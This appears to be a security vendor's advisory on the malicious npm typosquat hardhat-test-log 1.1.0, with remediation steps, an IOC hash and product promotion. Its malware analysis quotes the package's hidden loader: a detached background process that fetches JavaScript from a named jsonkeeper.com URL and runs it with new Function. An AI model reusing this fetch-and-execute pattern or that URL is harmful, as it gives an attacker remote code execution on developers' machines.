Which versions of hardhat-test-log are malicious?

The following npm versions of hardhat-test-log are flagged malicious: 1.1.0. Treat any of these as compromised.

How do I remediate hardhat-test-log if I installed it?

hardhat-test-log is a typosquat — you almost certainly intended a legitimately-named package. Remove hardhat-test-log, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

I already installed hardhat-test-log — how do I know if it already compromised me?

If hardhat-test-log was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

Is hardhat-test-log part of a known attack campaign?

Yes — hardhat-test-log is associated with the IN-MAL-2026-007420 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

How do I find hardhat-test-log across my projects, lockfiles, and CI pipelines?

Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for hardhat-test-log (version 1.1.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging hardhat-test-log across your stack and pipelines.

Malicious package

hardhat-test-lognpm

Malicious code in hardhat-test-log (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6369

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall hardhat-test-log

What this malware does

Package impersonates the legitimate hardhat-gas-reporter / eth-gas-reporter (README is a near-verbatim copy referencing eth-gas-reporter, but package.json name is hardhat-test-log). The exported reporter function in index.js sets var opt = 1 and unconditionally takes the else branch, making the plausible Mocha-reporter implementation in the if (!opt) block dead code that exists only as cover. The reachable branch calls utils.connectNet(...) in lib/utils.js, which uses child_process.spawn('node', [lib/syncResolve.js,...], { detached: true, stdio: ['ignore'] }) followed by progs.unref() to launch a detached, output-suppressed background process that survives the parent test runner. lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/NB36A', { headers: { 'x-secret-key': '_' } }), reads data.Cookie from the response, and executes it via new Function.constructor('require', result)(require) — full remote code execution in the developer's Node process with access to require. jsonkeeper.com is an anonymous free JSON paste host whose content the author can mutate at any time, so any developer who installs this package and runs their Hardhat/Mocha test suite using this reporter will execute whatever JavaScript the author chooses to host there.

Malicious versions

1 flagged

1.1.0

Indicators of compromise (SHA-256)

c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6

Detection & response playbook

Typosquat

Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for hardhat-test-log (version 1.1.0). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging hardhat-test-log across your stack and pipelines.
If you installed it — respond
hardhat-test-log is a typosquat — you almost certainly intended a legitimately-named package. Remove hardhat-test-log, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.
Did it already run?
If hardhat-test-log was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks hardhat-test-log before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. hardhat-test-log on npm has been identified as a malicious package (version 1.1.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007420

References

npmjs.com

Credits

Amazon Inspector · finder

Detect & block this

O3 blocks hardhat-test-log-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Malware detection Runtime egress monitoring